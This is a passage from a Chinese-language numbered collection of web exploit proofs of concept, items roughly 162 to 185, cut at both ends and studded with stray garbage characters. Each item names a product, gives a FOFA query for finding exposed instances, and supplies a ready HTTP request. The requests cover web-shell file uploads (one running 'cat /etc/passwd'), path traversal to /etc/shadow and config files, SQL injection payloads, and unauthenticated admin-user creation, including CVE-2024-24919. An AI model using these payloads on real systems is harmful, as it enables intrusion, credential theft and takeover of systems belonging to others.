6 m3 K" g8 J8 H. @. J) O<soap:Body>, Q9 Y( e0 c4 P% b" ~
<UploadResume xmlns="http://tempuri.org/">7 n$ d8 s0 x/ u! U# F* x
<ip>1</ip>
2 v! ~( F. \0 [: X$ q<fileName>../../../../dizxdell.aspx</fileName>' G' B) \ t, F( ~0 {5 ~; l, f
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>, B6 b5 A" W( T; G) @7 c! [2 }
<tag>3</tag>
S& `! _+ C9 U3 y% P) G</UploadResume>) x# k0 }; x/ k4 @, R; E
</soap:Body>) p G! V3 H. k
</soap:Envelope>
% {2 z4 Z" G0 \$ R# h( k6 z5 h! r8 ?% D/ v/ C0 c
, e5 q7 U: y! v0 P3 N6 d4 I$ [/ p
http://x.x.x.x/dizxdell.aspx
; B* S3 R$ r1 n. G: y3 D; C Y1 a% v6 Z
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
" n4 V( m3 q8 k/ a7 E: ^FOFA: app="和丰山海-数字标牌"' }& W4 S% z* |* s% m/ ~
POST /QH.aspx HTTP/1.1
% `' B9 L: Z$ b+ E; @6 ~Host: x.x.x.x
5 o3 M- j+ B9 z) ?1 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
7 o1 l8 y" w: e0 x" ^$ {% KConnection: close
' [) T- H# I& s$ ?& n. ?( o, P) {Content-Length: 583
4 s. i/ ?9 C5 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey( x& c: R" V, W/ M0 A! D/ i
Accept-Encoding: gzip8 w$ Y+ F. s( T! y
5 f' C) a- ^; d' P7 Q5 _------WebKitFormBoundaryeegvclmyurlotuey) V3 ~$ ^' p3 q/ `2 q2 x
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
% D2 r+ w$ _$ b2 wContent-Type: application/octet-stream
9 F" c' D# Q/ p9 A; M
7 {* A' r1 B3 s$ t<% response.write("ujidwqfuuqjalgkvrpqy") %>
$ r; ?% n0 y2 E) q------WebKitFormBoundaryeegvclmyurlotuey+ Q2 u! C: F# h' Z+ N
Content-Disposition: form-data; name="action"
, a+ g# ]5 A: X* \# M& F7 ?
3 r2 k( S' K* Nupload
( z- s; P2 X( _, Q------WebKitFormBoundaryeegvclmyurlotuey/ @: r1 A0 e/ F9 o" w! {- K3 Q( U0 t
Content-Disposition: form-data; name="responderId"
7 i1 L @ ]" `2 m5 `9 f. r: |5 x; u( Z
ResourceNewResponder* p/ F6 I# j4 e+ q, ?
------WebKitFormBoundaryeegvclmyurlotuey
: O2 X, w6 N @7 \9 ?Content-Disposition: form-data; name="remotePath"4 a! u( u- L/ p: p+ H) v
- J* `! }7 U$ N1 q3 u7 Q) I
/opt/resources+ F; W/ d9 J i' }% C
------WebKitFormBoundaryeegvclmyurlotuey--
, r6 K5 D4 r5 r7 s# Q
$ T6 ^ i8 k4 r
: a3 f+ a0 k% F# F8 Bhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
9 s* e9 D2 l4 `$ G! k2 M& Z' Q( ?# Y- \+ D, L5 ~% F4 k0 y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
[& |. n: _0 n! B# C6 u" _FOFA: icon_hash="-795291075"0 w& N, l& P/ @0 k& L
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
8 A1 C$ y" E; _Host: x.x.x.x
]+ M# T% ~9 |' AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
" ^/ V6 S b4 Q8 WConnection: close' X) {; e4 T0 A8 C
Content-Length: 2931 X; N4 U# J. L9 a
Accept: */*
8 i" R/ p9 J, v' u( B! kAccept-Encoding: gzip, deflate
8 G# H% E1 i. JAccept-Language: zh-CN,zh;q=0.9
& ?7 V; L+ _4 L kContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod5 M+ D" V6 c8 V z6 [9 x U4 ]. i
! P( X" |4 i# {2 @9 d X- y
------iiqvnofupvhdyrcoqyuujyetjvqgocod
6 [& h, x' [% F+ l( J& ]Content-Disposition: form-data; name="name"; I0 J8 \4 r8 \5 Q$ w
/ U: g4 T O u% f; D
1.php% |, v9 I( {! V- t3 q; A
------iiqvnofupvhdyrcoqyuujyetjvqgocod
: V; S! M$ [' tContent-Disposition: form-data; name="upfile"; filename="1.php"
, ~6 `& ]+ _. z" LContent-Type: image/jpeg3 n' ^. c1 w! j3 [
, K) ^) K7 O9 B- O: a. o9 E7 |rvjhvbhwwuooyiioxega
/ C" @8 |& S1 O t* o/ O# C------iiqvnofupvhdyrcoqyuujyetjvqgocod--7 Z8 p7 u9 {+ H$ f5 _
) I" o+ B( G: t" g/ ^) `2 g) {3 I
6 f2 b) M8 Y% Y( K- G, n% n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
1 z% g* i% R/ v0 Z1 r7 dFOFA: title="智慧综合管理平台登入"
/ ~3 j8 G9 v4 A1 W [+ JPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
& O* @; i2 l" T4 u4 NHost: x.x.x.x. ?( l8 p* _. s% B( A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.04 x2 N" H* X( U5 d, {1 \( w X
Content-Length: 288+ a% r% p6 p: [ M6 Z
Accept: application/json, text/javascript, */*; q=0.018 V, M N) @4 ~& B% @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
7 W* t, R- A; ^' O, B$ L3 B8 z6 p. jConnection: close7 p* p' w) q0 F
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
! O8 ^6 X5 S3 y1 O, t* r* b' @X-Requested-With: XMLHttpRequest
4 i. {& f! n! s q" q sAccept-Encoding: gzip
+ \2 I7 X* ~' P+ a6 d4 N, S, }+ v$ {5 N0 b* y
------dqdaieopnozbkapjacdbdthlvtlyl
& U1 J8 c4 d+ W4 a bContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
. j$ Z: D% O" R8 G0 a; yContent-Type: image/jpeg
/ B4 X0 j9 t7 ^* t" ~, {- t' c! U C) ^: i6 [) C* ?
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 M6 m9 Y$ R5 z% ~9 d------dqdaieopnozbkapjacdbdthlvtlyl--' ^1 [' W, U ?( c! v5 V) ?
$ C, {% S" }/ ~/ w7 f/ Y
9 s* g4 c" s& E$ ~# b) z( d7 Vhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' D% e8 F9 k* Q- I1 P
R5 k$ U s& A' \/ e T% ~
165. OrangeHRM 3.3.3 SQL 注入+ e" K1 E$ x. Z+ ~( c* ]
CVE-2024-36428
; d4 \9 y p8 \5 i: `FOFA: app="OrangeHRM-产品" g7 U/ U( l7 ?# \% K k% `
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))5 A- A; @% R# r# @7 E
7 k( |! b" H) r6 _8 B" S+ c9 E- n5 Z: q4 D% B* y6 O6 }/ r
166. 中成科信票务管理平台SeatMapHandler SQL注入6 \- ~6 j3 p. n: L2 R) D" r" P: Q0 G( M
FOFA:body="技术支持:北京中成科信科技发展有限公司"/ {) }- y1 @4 R z
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
3 T/ j3 a7 m* e2 l) N- g$ R1 uHost:
0 m5 R, m% F, p6 w1 a" ~0 V! LPragma: no-cache& W& i0 ?; ]! l
Cache-Control: no-cache$ h6 |6 N" H7 D' ?' b$ n- V
Upgrade-Insecure-Requests: 1$ g2 t/ g8 Q( x+ X4 ~' ]- ^& c" Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.361 P0 J& O5 G/ k0 _3 O( j! o# x* ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 y9 g6 X R& V, V. N
Accept-Encoding: gzip, deflate
! q5 {' o+ _9 c4 j2 |& oAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
' L/ r* f& s+ {. K( c2 i, kCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
2 @0 n) `) E* F% ^/ K( S9 oConnection: close8 P' \, g E7 R" x! @& i% Y$ E8 x
Content-Type: application/x-www-form-urlencoded! M; F% \7 O# J/ z* h `
Content-Length: 896 r* p5 X0 `3 v J8 x) I3 G8 I
% a7 \+ s) L9 b! H- p' r3 }4 w' d
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE: y# i5 o) N6 U4 h7 v
! ~6 V+ Z* I/ t& _. E- [& i. m) a* e, W5 D! d) h1 [
167. 精益价值管理系统 DownLoad.aspx任意文件读取
2 F" e. }+ y$ W) ]! \. @0 n" XFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"9 I3 [- H C" p9 |; A$ n3 n! \
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.16 @1 H3 O4 c C
Host:4 N# V& ?2 I: e1 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- j# G, W0 e' _ F; M9 [Content-Type: application/x-www-form-urlencoded9 H& K+ ]( U S: r7 H
Accept-Encoding: gzip, deflate
" `6 B# |/ T0 v& A3 x% c7 j" EAccept: */*
/ R# D' i6 \2 g' c- _& o1 B- s( u* iConnection: keep-alive: d0 S" F- L1 d: `
) ~1 T w, |, ~, i- _( l& @$ e) d& o
168. 宏景EHR OutputCode 任意文件读取
! \/ \0 K$ l2 D; VFOFA:app="HJSOFT-HCM"4 W3 b3 {8 f+ f3 w2 v5 V
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
; f; {8 X) a& H; o0 DHost: your-ip4 A; @# T* t4 t8 ~ y: r, c* ~7 y) c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
5 b( L5 y8 Y2 H1 ?( dContent-Type: application/x-www-form-urlencoded! M! a5 g4 y$ c- p, C
Connection: close
6 q; R! R. x0 C' Y5 z" b
% Q' u1 ~. [: ?8 y
" e' m" j* C4 ]' ^- F i+ R% g1 y! ^. k1 |$ [+ K8 s
169. 宏景EHR downlawbase SQL注入 j: ?2 n! e! s, x
FOFA:app="HJSOFT-HCM"( Y+ c% q, Z$ Q
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
+ j6 }/ j) c1 W# H/ k; MHost: your-ip2 W1 ~+ a; s/ } n: i/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" r/ ?5 Q3 Q* |: z. P! E2 E# ~
Accept: */*
2 @5 f( h7 O& h% ~' q/ ^- _4 s5 ^Accept-Encoding: gzip, deflate% j4 M' f4 N D" z
Connection: close. j j/ _( r6 V
/ v9 q# w; j) ]$ q5 `" V% Y4 _4 C) j- _ b$ y; z5 s; n; E
$ l+ t+ Z2 Y1 q, Y( ^; Y( [170. 宏景EHR DisplayExcelCustomReport 任意文件读取9 z7 v& N" r: k- p2 A- q1 [
FOFA:body="/general/sys/hjaxmanage.js"
5 p# G+ w0 N3 M! CPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
1 W7 B2 ^9 @: p8 hHost: balalanengliang
% v- A! t7 W: {9 J5 n, GUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ `1 w& Z* n8 x! p2 L
Content-Type: application/x-www-form-urlencoded3 j1 m6 P" |) ]( v
" r" V2 _: B- h8 S; ~# ]$ ~filename=../webapps/ROOT/WEB-INF/web.xml
, q6 s h( S9 ?' v7 u& D; ?" W2 V6 v9 G9 x
$ i7 |% X3 e2 S a+ q: _$ N
171. 通天星CMSV6车载定位监控平台 SQL注入
2 L3 x! t% }6 i1 _9 B1 n( IFOFA:body="/808gps/"* Z& _' U2 }' O( e T& {) B
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.15 T6 c* B' k2 L% O# ^8 S
Host: your-ip
6 ~' V, w$ ~/ S* oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0. Y+ l2 \/ w; ~; p( y
Accept: */*
! K- m% m( I/ \" H( AAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 z f# k" u4 s' m: Y; a l+ G CAccept-Encoding: gzip, deflate5 a7 N' }: ~9 N) o0 {- s& k
Connection: close/ y" K- z- y& a
9 i( L* T/ H$ f0 ]2 v& a' ~
+ d# m+ v0 R2 q; h6 z1 f' v% X" H+ m$ [! e7 T9 Y
172. DT-高清车牌识别摄像机任意文件读取$ ^( a3 m; ?, j4 o# S1 h {
FOFA:app="DT-高清车牌识别摄像机"8 x ^7 b8 n$ C' r( i( K
GET /../../../../etc/passwd HTTP/1.16 ]# g# P0 t# a
Host: your-ip
# B+ H9 R* U- |3 g0 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( ^# z# q3 q' ?/ AAccept-Encoding: gzip, deflate
9 _8 f! b" ^5 Q( f7 I- K! H! GAccept: */*. J! I n: X2 i( B- \; u* v* [
Connection: keep-alive
' `+ t; {* U% _, N! `" o+ I8 X1 B+ p
; N( p7 O8 ~( V& g. T; h
$ B7 P; u: k# s6 `, b173. Check Point 安全网关任意文件读取
" t2 A1 w" t& A% }5 R' ?CVE-2024-24919
$ G9 D. n9 [$ o2 O: lFOFA:app="Check_Point-SSL-Network-Extender"
+ B2 m o, _4 n; XPOST /clients/MyCRL HTTP/1.1
, Y) d) S @% h" d* K( h. m, \Host: your-ip
, r" p3 [2 p6 R& @( OContent-Type: application/x-www-form-urlencoded
P) G4 ~ c/ a# _- U
1 ], l9 c5 M8 ]1 Q( a3 daCSHELL/../../../../../../../etc/shadow6 T- W ^6 ~/ ]
+ |1 A% J z( E9 L
* O* p* x( _2 ^9 E- M* S
% J9 @% O; z* h) r5 F174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 W% p- ]& z1 D8 f: _7 `" S1 tFOFA:app="金和网络-金和OA"
" N! a/ S1 M& Z2 Q" }) F1 hGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
! R. [6 e+ L9 B' o* _) zHost: your-ip
) V) |1 x6 B7 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ D/ f7 N) }, m5 T3 p+ u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 [1 g ~- h2 @) e! [
Accept-Encoding: gzip, deflate, br
! G& O k) ~' u4 wAccept-Language: zh-CN,zh;q=0.9
- n3 K" g- X1 R, O% pConnection: close
: W3 G$ `% Y2 K' p$ \6 t" Y% Q* ?& J$ t
& ]) O& c9 p! v4 ^% a( l7 G+ t, h! @$ ]; M
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
# U. `( u; S0 r+ HFOFA:app="金和网络-金和OA"
6 c l* ?1 s, w4 ^6 Q0 g4 P& f" XGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
4 _6 ^1 v% P; \Host:1 d- Q5 F: s7 g/ V) S
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# c6 N9 e$ h) Z6 ?3 p2 o. _$ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& t n5 Y/ x, K5 G! j# U+ ?% tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: @2 ~0 l$ j( T$ b9 u/ E; \6 v2 R
Accept-Encoding: gzip, deflate
& y- ^( E R! B" ^% eConnection: close2 {: o: q4 ]9 v6 j
Upgrade-Insecure-Requests: 1
! G8 `+ {' G) k5 T. d$ j6 X# j0 a+ u$ n0 C S
. b* H6 z% |" [4 @4 Z8 G& i176. 电信网关配置管理系统 rewrite.php 文件上传
9 M, k5 z9 m9 E3 f: q A) e P6 PFOFA:body="img/login_bg3.png" && body="系统登录"( M5 ?; o; W3 h4 C* C2 e
POST /manager/teletext/material/rewrite.php HTTP/1.1
4 s% [6 A; h0 Y2 VHost: your-ip
0 ? k: L- v1 g+ Z! K* @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
' R# ]0 R v- L$ T% Z% u# \0 nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
6 P8 ~& e8 O6 k) L4 i FConnection: close2 i* p6 Y! R7 O2 R
q% J4 g: F+ K! R* u. v------WebKitFormBoundaryOKldnDPT
8 K$ S* X; A, @, {Content-Disposition: form-data; name="tmp_name"; filename="test.php"
5 L! C4 j& t: _) uContent-Type: image/png
+ E5 [4 n, P8 W8 O. s9 H + i% H6 t: n; l) A) `: _
<?php system("cat /etc/passwd");unlink(__FILE__);?>! [: W" Z9 U. I! g: w' s
------WebKitFormBoundaryOKldnDPT
- J, x& d8 {5 U1 dContent-Disposition: form-data; name="uploadtime"
: a4 \! o* A1 ^& J \
+ f0 D4 u9 e7 r - \- f+ a0 X& j$ @: n. A
------WebKitFormBoundaryOKldnDPT--
) _) n" C+ [6 L0 w+ r
; ~/ {, N" w2 B Y1 i: o) R- s) k G
. A% r5 ], z! D( a' d8 I177. H3C路由器敏感信息泄露
, n# m( `* C2 l/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 E4 j- Q+ V* i* n/ b
/userLogin.asp/../actionpolicy_status/../M60.cfg
/ ]9 D X6 j% S; u# H/userLogin.asp/../actionpolicy_status/../GR8300.cfg
, y; `0 x, w! Q/userLogin.asp/../actionpolicy_status/../GR5200.cfg
# D8 A+ W% S: P/userLogin.asp/../actionpolicy_status/../GR3200.cfg
; c" \( m" `. M/ B6 f/userLogin.asp/../actionpolicy_status/../GR2200.cfg
3 G; b6 L: J% z5 l/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* u- \! q. i6 M [% s- m1 q5 g) _
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
4 @ T4 b% i7 M+ A" E( D/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg( _/ L- L0 C! s# Q' W: ^$ I
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" M# s/ z5 C0 M P1 t) z& ~/userLogin.asp/../actionpolicy_status/../ER5200.cfg
0 H7 ]$ A, o4 Q/userLogin.asp/../actionpolicy_status/../ER5100.cfg
1 i8 I% C5 B0 c% B, D: d/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
' @0 a/ I/ r$ f2 y: `8 @/userLogin.asp/../actionpolicy_status/../ER3260.cfg) S( g" L4 T# Y* P0 h
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/ U5 t# V& b) t+ s0 b6 x T/userLogin.asp/../actionpolicy_status/../ER3200.cfg5 _0 v/ a7 e0 ~' A( C$ T3 A) m
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg) U7 d3 u( K( j( o$ t
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg$ Q4 O# n' y. w0 _6 r. N( `0 E" S1 d
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
$ [5 z* ]/ [: c/userLogin.asp/../actionpolicy_status/../ER3100.cfg
) t: f0 `* C! \) l6 F3 `/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg% H( a. c) I: k1 K2 M# n: b
# k+ u3 }3 ~# b( M" Q1 C) s! b) z! e
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
; g9 v* w# F, w2 f! _1 B. HFOFA:header="/selfservice"$ K3 n. F, ]$ A' Q! u
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
4 Q* S, Q ]. f( d W1 EHost:" ~% t: ]8 m7 I7 }- d$ y7 f8 w. f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 T* \# d' J& T3 G3 C; l$ HContent-Length: 252 h) C4 m6 R# Z' ` V) {2 e
Accept-Encoding: gzip, deflate$ P9 v( \0 `. j' I% @% ]
Connection: close
+ F% }" }& x& ~; O5 e; hContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
1 D( f" d' i# X: D-----------------aqutkea7vvanpqy3rh2l
: | Y, H( U J& o! |! W) CContent-Disposition: form-data; name="12234.txt"; filename="12234"3 O5 I* ]4 ]& `7 U% ?. ]
Content-Type: application/octet-stream& [/ [ L y1 Q4 a# g; o* C
Content-Length: 255
# H7 e4 X. J" Z5 o2 i
- \3 j8 ]: @/ n: K2 h# V12234
( Q7 i3 Z6 n0 o; b! v-----------------aqutkea7vvanpqy3rh2l--
: {6 S. ^( r. a1 \! G0 D, |; x" N e" G9 N+ B8 w6 w
1 S3 @* k- d" dGET /imc/primepush/%2e%2e/flex/12234.txt- |- h& N* K# K& H
' ?4 U5 p8 R" j5 }, Q4 k
+ t6 ~& k* I& U1 ^1 w" l* V
179. 建文工程管理系统存在任意文件读取1 | M7 r5 ~7 M' Z
POST /Common/DownLoad2.aspx HTTP/1.1
1 ?$ }' s% i$ D0 H. D" _Host: {{Hostname}}
, s! D" w9 f; c' T. fContent-Type: application/x-www-form-urlencoded$ F, Y# J7 [5 p2 J7 E( u$ x% T
User-Agent: Mozilla/5.06 U3 i$ a. v$ |4 J" \
* n& T7 f" z6 z; @! }5 r
path=../log4net.config&Name=
) y1 N6 c* b" ], f- v6 y
3 D* j6 `% p- v% Y( X7 V8 e0 w6 H- s; w/ Z/ Y+ D' g q
180. 帮管客 CRM jiliyu SQL注入
3 ?1 h/ e4 ^% G& w+ bFOFA:app="帮管客-CRM"0 J z* I' m5 U; ~
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1( I ?& A& t; s5 A" e: c
Host: your-ip7 }; l9 V; P9 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 [3 g+ m3 Q: v" UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ P) ^1 ~' Y% G% q. Q) Z
Accept-Encoding: gzip, deflate
+ o7 g1 x1 e! t$ ^2 O5 f# M: x, u1 MAccept-Language: zh-CN,zh;q=0.9+ C( ^4 V+ T( k5 }% R
Connection: close$ ?6 D c& b' V# d5 v" @
9 c8 W( J4 ?+ S7 o7 V
! X3 K3 [( B+ O! X8 c% ]0 v
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
/ |6 B+ Q9 x$ tFOFA:"PDCA/js/_publicCom.js"
6 H& n( }6 \3 f. w( W$ U/ TPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1( j) Q |- _3 C9 b3 e
Host: your-ip" C3 j2 j- s# {2 z. `1 Y& n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
. v7 E9 E' \; ~1 m% ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- V: I* g; ]: e4 C/ c2 I
Accept-Encoding: gzip, deflate, br* r3 x- c% A. _& S D! O
Accept-Language: zh-CN,zh;q=0.9, O- A( l W0 w$ U n5 H7 D
Connection: close
; I* T3 c8 @1 V1 y5 BContent-Type: application/x-www-form-urlencoded' x8 \/ B; j8 b! ]+ f+ c' u9 W
W% }& q6 J0 X0 [) y6 J! |" `
4 s8 D8 V: d4 Q! Maction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20( Y5 m. M) n8 G+ z! J6 q
( p9 B& i y8 E
* ^6 x8 [- i# f; ?, B182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
7 `$ _% `% \7 KFOFA:"PDCA/js/_publicCom.js"% C5 r% X0 B: N, l/ H1 F
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1 ^/ n7 i- a- k$ e) [
Host: your-ip f' G4 e/ o. p5 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.365 @9 X6 T" b; s4 b5 B1 l% |) ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. o+ Y+ y$ p4 H+ M9 E$ J
Accept-Encoding: gzip, deflate, br
( S- l9 s8 ~; a* w1 {5 iAccept-Language: zh-CN,zh;q=0.9
8 Y: c7 r' k7 B: L, G( jConnection: close8 h3 {$ v r2 J* I* L2 W3 k1 q
Content-Type: application/x-www-form-urlencoded
6 p' ]+ X0 y8 |2 Z1 U# m i
+ ^) p1 B- W& H3 U+ N# ^5 f4 z* d- O
username=test1234&pwd=test1234&savedays=15 U. ^8 q7 V6 ]- Y
9 n# R7 Y- g S# |" j
+ P& J- j+ c" b6 y. [- P7 `183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入0 r4 P6 c2 y! z! g
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
! G3 A0 C ]$ G5 zGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1( H: a* \' k8 X1 D" `; w
Host: your-ip
5 ?) H, N6 C% g* o# y- b% g$ z- _User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
- R( L1 L) B6 q- M9 g$ {) OAccept-Charset: utf-88 H% C0 v1 _/ n$ `$ D* I
Accept-Encoding: gzip, deflate% O9 `. u* N& G) ?6 \% P( V5 {
Connection: close E. J" c0 V; g5 { }# u7 \0 |
0 \2 e! P6 A+ G; E8 `
( S+ r5 o2 ]- O% {5 A; O184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
6 e3 T8 m$ F7 l. Y. yFOFA:server="SunFull-Webs"( @, D* H5 h( ]6 g
POST /soap/AddUser HTTP/1.17 B- c/ N' h9 P
Host: your-ip! i& Q5 {# m' }8 K+ U8 E, T
Accept-Encoding: gzip, deflate
: p+ l7 q7 O5 f# ]/ r# [/ aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, J! X- v- i! y+ V/ UAccept: application/xml, text/xml, */*; q=0.01
" |! [3 L3 z0 h6 C9 s8 o; _3 a# E' D6 d' `Content-Type: text/xml; charset=utf-8
& I; j2 }9 B( ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) \0 B* k2 e$ g# S
X-Requested-With: XMLHttpRequest
7 i; `; l, Q: n/ K+ m7 g
% l( i, i4 n3 N, x
, H( A/ P5 L2 |: i# `insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
: M* z* i( U" ^ E# c$ R. j; k+ t$ V, p; ]& [
( }% r8 _: j) \
185. 瑞友天翼应用虚拟化系统SQL注入
1 ]2 L J( y: s: o6 ~. q2 n; |version < 7.0.5.1 \, z1 Z2 P" @0 f0 i; _" j9 ~
FOFA:app="REALOR-天翼应用虚拟化系统"
